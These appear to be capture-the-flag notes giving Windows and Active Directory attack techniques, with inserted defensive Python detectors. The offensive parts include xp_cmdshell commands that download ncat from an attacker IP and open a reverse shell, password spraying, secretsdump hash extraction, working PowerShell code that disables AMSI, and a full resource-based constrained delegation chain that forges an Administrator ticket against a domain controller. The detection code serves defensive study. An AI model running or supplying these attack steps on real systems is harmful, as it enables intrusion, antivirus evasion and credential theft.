CTF Notes: 2024-06-01 IDOR SQL RCE AMSI Bypass RBCD
Insecure direct object references (IDOR)
In this section, we explain what insecure direct object references (IDOR) are and describe some common forms of the vulnerability. IDOR is a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly.
For example, an authentication link of the following form may be tampered with to gain access to another user's object:
http://url/auth/token/<base64-encoded>/session_id/
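As an added example (not code from the original notes), the same session lookup written once without and once with an ownership check; the store, the `Session` type and the `Forbidden` error are assumed names, and the path segment is taken straight from the URL form above:

```python
# Added example, not from the original notes: the same session lookup with and
# without an ownership check. Names (Session, SESSIONS, Forbidden) are assumed.
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    session_id: str
    owner: str  # user the session object belongs to


# Constructed sample store: two users, one session each.
SESSIONS = {
    "s-1001": Session("s-1001", "alice"),
    "s-1002": Session("s-1002", "bob"),
}


class Forbidden(Exception):
    pass


def session_id_from_path(path: str) -> str:
    """Takes the trailing segment of /auth/token/<base64>/<session_id>/ verbatim:
    this is the user-controlled value a direct object reference is built from."""
    return path.rstrip("/").rsplit("/", 1)[-1]


def get_session_vulnerable(path: str) -> Session:
    """IDOR: whatever id the path names is returned, regardless of who asks."""
    return SESSIONS[session_id_from_path(path)]


def get_session_checked(current_user: str, path: str) -> Session:
    """Resolve the id, then enforce that the authenticated caller owns the object.
    Unknown and foreign ids fail identically so the check does not leak existence."""
    obj = SESSIONS.get(session_id_from_path(path))
    if obj is None or obj.owner != current_user:
        raise Forbidden("session not accessible")
    return obj


def can_access(current_user: str, path: str) -> bool:
    """Boolean wrapper around the checked lookup, handy for tests and audits."""
    try:
        get_session_checked(current_user, path)
        return True
    except Forbidden:
        return False
```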
RCE via SQL Server
This section describes how to enable the xp_cmdshell SQL Server configuration option. The option lets system administrators control whether the xp_cmdshell extended stored procedure can be executed on a system. By default, xp_cmdshell is disabled on new installations.
xp_cmdshell can be used to achieve RCE; however, sometimes it is not enabled. To enable it:
EXECUTE AS LOGIN = 'SA';
EXEC sp_addsrvrolemember 'username', 'sysadmin';
sp_configure 'Show Advanced Options', 1
RECONFIGURE
sp_configure 'xp_cmdshell', 1
RECONFIGURE
- prepare reverse shell
# using ncat here to avoid AV detection
EXEC xp_cmdshell 'curl -s http://ip/ncat.exe -o c:\path\ncat.exe'
EXEC xp_cmdshell 'curl -s http://ip/libssl-3.dll -o c:\path\libssl-3.dll'
EXEC xp_cmdshell 'curl -s http://ip/libcrypto-3.dll -o c:\path\libcrypto-3.dll'
EXEC xp_cmdshell 'c:\path\ncat.exe ip 4444 -e cmd.exe'
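As an added example (not code from the original notes), a detection that flags the enablement chain above in SQL Server audit records; the `ts login=<login> stmt=<T-SQL>` record format and the sample lines are constructed, as if exported from a server audit:

```python
# Added example, not from the original notes: flag the xp_cmdshell enablement
# sequence in SQL Server audit records. The record format is a constructed
# "ts login=<login> stmt=<T-SQL>" line, assumed to come from an audit export.
import re

LINE = re.compile(r"^(?P<ts>\S+ \S+) login=(?P<login>\S+) stmt=(?P<stmt>.*)$")

# Each step of the enablement/abuse chain, matched case-insensitively.
STEPS = {
    "sysadmin_grant": re.compile(r"sp_addsrvrolemember\s+'[^']+'\s*,\s*'sysadmin'", re.I),
    "advanced_options": re.compile(r"sp_configure\s+'show advanced options'\s*,\s*1", re.I),
    "xp_cmdshell_enabled": re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I),
    "xp_cmdshell_exec": re.compile(r"\bxp_cmdshell\s+'", re.I),
}

# Constructed sample audit export: one login enables and runs xp_cmdshell,
# another only runs an ordinary query.
SAMPLE_AUDIT = """\
2024-06-01 10:00:01 login=sa stmt=EXEC sp_addsrvrolemember 'svc_web', 'sysadmin'
2024-06-01 10:00:05 login=sa stmt=sp_configure 'show advanced options', 1
2024-06-01 10:00:06 login=sa stmt=RECONFIGURE
2024-06-01 10:00:07 login=sa stmt=sp_configure 'xp_cmdshell', 1
2024-06-01 10:00:09 login=sa stmt=EXEC xp_cmdshell 'whoami'
2024-06-01 10:01:00 login=reporting stmt=SELECT name FROM sys.tables
"""


def steps_by_login(text: str) -> dict:
    """Map each login to the ordered list of chain steps it executed."""
    found: dict = {}
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that do not parse rather than guessing
        for name, pat in STEPS.items():
            if pat.search(m["stmt"]):
                found.setdefault(m["login"], []).append(name)
    return found


def logins_enabling_then_executing(text: str) -> set:
    """Logins that turned xp_cmdshell on and later executed it: the strongest
    signal that the option was enabled for command execution, not by policy."""
    flagged = set()
    for login, steps in steps_by_login(text).items():
        if "xp_cmdshell_enabled" in steps:
            first_enable = steps.index("xp_cmdshell_enabled")
            if "xp_cmdshell_exec" in steps[first_enable + 1:]:
                flagged.add(login)
    return flagged
```

A complementary state check is `SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'`, which tells you the option is on but not who turned it on.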
SQL Server enum
- search for possible config files
dir /s *.INI
- password spray using crackmapexec
> crackmapexec smb target -u users.txt -p passwords.txt
- If there is a hit, run commands as that account with RunasCs: https://github.com/antonioCoco/RunasCs
.\RunasCs.exe username password cmd.exe -r ip:port
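From the defender's side, as an added example (not code from the original notes): a detection for a spray like the crackmapexec run above, working on constructed logon-audit lines where 4625 is a failed and 4624 a successful logon; the line format is assumed:

```python
# Added example, not from the original notes: spot a password spray like the
# crackmapexec run above in constructed Windows logon-audit lines
# (event 4625 = failed logon, 4624 = successful logon).
import re
from datetime import datetime, timedelta

LINE = re.compile(r"^(?P<ts>\S+) (?P<event>4624|4625) src=(?P<src>\S+) user=(?P<user>\S+)$")

# Constructed sample: 10.0.0.5 tries many accounts once each and then succeeds
# for one of them; 10.0.0.9 is a single user mistyping their own password.
SAMPLE_LOGONS = """\
2024-06-01T10:00:00 4625 src=10.0.0.5 user=alice
2024-06-01T10:00:01 4625 src=10.0.0.5 user=bob
2024-06-01T10:00:02 4625 src=10.0.0.5 user=carol
2024-06-01T10:00:03 4625 src=10.0.0.5 user=dave
2024-06-01T10:00:04 4625 src=10.0.0.5 user=erin
2024-06-01T10:00:05 4624 src=10.0.0.5 user=frank
2024-06-01T10:00:10 4625 src=10.0.0.9 user=grace
2024-06-01T10:00:11 4625 src=10.0.0.9 user=grace
"""

def parse(text):
    """Yield (timestamp, event, source, user) for every well-formed line."""
    for raw in text.splitlines():
        m = LINE.match(raw)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["event"], m["src"], m["user"]

def spray_sources(text, min_users=5, window=timedelta(minutes=5)):
    """Sources with failed logons for at least min_users distinct accounts inside
    one sliding window. A spray is many users per source, not many tries per user."""
    failures = {}
    for ts, event, src, user in parse(text):
        if event == "4625":
            failures.setdefault(src, []).append((ts, user))
    hits = {}
    for src, events in failures.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= min_users:
                hits[src] = sorted(users)
                break
    return hits

def successes_from_sprayers(text, **kw):
    """(source, user) pairs that logged on successfully from a spraying source:
    the 'hit' to treat as a probable compromised account."""
    sprayers = spray_sources(text, **kw)
    return {(src, user) for _, ev, src, user in parse(text)
            if ev == "4624" and src in sprayers}
```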
Memory dump analysis
If the operating system crashes, a complete memory dump may be generated to give the vendor's technical support team additional information. Developers can then use the dump file to understand why the crash occurred and provide an accurate fix.
- To extract files from a memory dump: https://github.com/ufrisk/MemProcFS
- Dumping the hashes from extracted files
> impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local
AMSI bypass
An Anti-Malware Scan Interface (AMSI) bypass is useful when an AV is running. Below is an example bypass for Windows 11: https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6
function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
Equals('System.dll')
}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -like "Ge*P*oc*ddress") {$tmp+=$_}}
return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,
@($moduleName)), $functionName))
}
function getDelegateType {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]]
$func, [Parameter(Position = 1)] [Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass,
AutoClass', [System.MulticastDelegate])
$type.
DefineConstructor('RTSpecialName, HideBySig, Public',
[System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.
DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType,
$func). SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}
$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)
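As an added example (not code from the original notes), a scorer for PowerShell script-block logging content (event 4104) that looks for the traits the bypass above relies on rather than for literal strings; the indicator names and the two sample blocks are constructed:

```python
# Added example, not from the original notes: score PowerShell script-block text
# (event 4104 content) for the AMSI-tampering traits the bypass above relies on:
# wildcard lookups that avoid the literal names AmsiUtils/amsiContext, resolving
# GetProcAddress through an obfuscated name, and writing raw bytes into a pointer.
import re

INDICATORS = {
    # wildcard type/field lookups that resolve AMSI internals without naming them
    "wildcard_amsi_type": re.compile(r"-like\s+'\*siUtils'", re.I),
    "wildcard_amsi_field": re.compile(r"-like\s+'\*siContext'", re.I),
    # reflection to reach the assembly holding AMSI and its non-public static fields
    "ref_assembly_types": re.compile(r"\[Ref\]\.Assembly\.GetTypes\(\)", re.I),
    "nonpublic_static": re.compile(r"GetFields\('NonPublic,\s*Static'\)", re.I),
    # obfuscated native resolver name and the raw memory write
    "obfuscated_getprocaddress": re.compile(r'-like\s+"Ge\*P\*oc\*ddress"', re.I),
    "marshal_copy_to_intptr": re.compile(r"Marshal\]::Copy\(", re.I),
}


def amsi_tamper_indicators(script: str) -> list:
    """Names of the indicators present in a script block, in a fixed order."""
    return [name for name, pat in INDICATORS.items() if pat.search(script)]


def is_suspicious(script: str, threshold: int = 3) -> bool:
    """Several traits together are rare in admin scripts; one alone
    (e.g. Marshal::Copy) is common, so a single hit is not enough."""
    return len(amsi_tamper_indicators(script)) >= threshold


# Constructed samples: fragments in the style of the bypass above, and a benign
# script that legitimately uses Marshal::Copy.
SUSPECT_BLOCK = (
    "$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}\n"
    "$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}\n"
    "[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)\n"
)
BENIGN_BLOCK = (
    "$buf = New-Object byte[] 16\n"
    "[System.Runtime.InteropServices.Marshal]::Copy($ptr, $buf, 0, 16)\n"
)
```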
Resource-based Constrained Delegation
Resource-based constrained delegation is similar to constrained delegation, but instead of granting an object permission to impersonate users against a service, the permission is set on the target resource itself: its msds-allowedtoactonbehalfofotheridentity attribute lists which accounts may act on behalf of other users when authenticating to it. https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation#creating-a-computer-object
Exploitation needs the following two tools:
- https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Create a new attacker-controlled machine account
New-MachineAccount -MachineAccount newmachine -Password $(ConvertTo-SecureString 'password' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer newmachine -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
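As an added example (not code from the original notes), an audit helper that parses the SDDL form of a computer's msds-allowedtoactonbehalfofotheridentity descriptor, the string format built above, and reports trustees that are not on an approved list; it assumes the binary value has already been converted to SDDL text (for example with RawSecurityDescriptor.GetSddlForm), and the SIDs are constructed:

```python
# Added example, not from the original notes: audit who is allowed to act on
# behalf of other identities to a computer by parsing the SDDL form of its
# msds-allowedtoactonbehalfofotheridentity descriptor (the string built above).
# Assumes the binary descriptor has already been converted to SDDL text; the
# SIDs below are constructed.
import re

ACE = re.compile(r"\((?P<body>[^)]*)\)")
FULL_CONTROL = "CCDCLCSWRPWPDTLOCRSDRCWDWO"  # the rights string used in the notes


def parse_dacl(sddl: str) -> list:
    """Return the DACL ACEs as dicts: type, rights and trustee (SID or alias)."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    if not m:
        return []
    aces = []
    for body in ACE.findall(m.group(1)):
        parts = body.split(";")
        if len(parts) != 6:
            continue  # conditional and other ACE forms are out of scope here
        aces.append({"type": parts[0], "rights": parts[2], "trustee": parts[5]})
    return aces


def unexpected_trustees(sddl: str, approved: set) -> list:
    """Allow ACEs whose trustee is not approved: each one is an account that
    can impersonate users to this computer via RBCD."""
    return [a["trustee"] for a in parse_dacl(sddl)
            if a["type"] == "A" and a["trustee"] not in approved]


def has_full_control(sddl: str, trustee: str) -> bool:
    """True when the trustee holds the full-control rights string."""
    return any(a["trustee"] == trustee and a["rights"] == FULL_CONTROL
               for a in parse_dacl(sddl) if a["type"] == "A")


# Constructed sample: the descriptor form from the notes with a made-up SID for
# a newly created machine account, beside an approved front-end web server.
ATTACKER_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"
WEB_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
SAMPLE_SDDL = (f"O:BAD:(A;;{FULL_CONTROL};;;{WEB_SID})"
               f"(A;;{FULL_CONTROL};;;{ATTACKER_SID})")
```

Pairing this with monitoring for new computer objects (MachineAccountQuota lets ordinary users create them) catches the setup step as well as the resulting ACE.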
Get a ticket impersonating Administrator
> impacket-getST -spn 'cifs/dc.target' -impersonate 'Administrator' 'domain/newmachine$:password' -dc-ip dc.target
Dump secrets
KRB5CCNAME=Administrator.ccache impacket-secretsdump domain/administrator@target -k -no-pass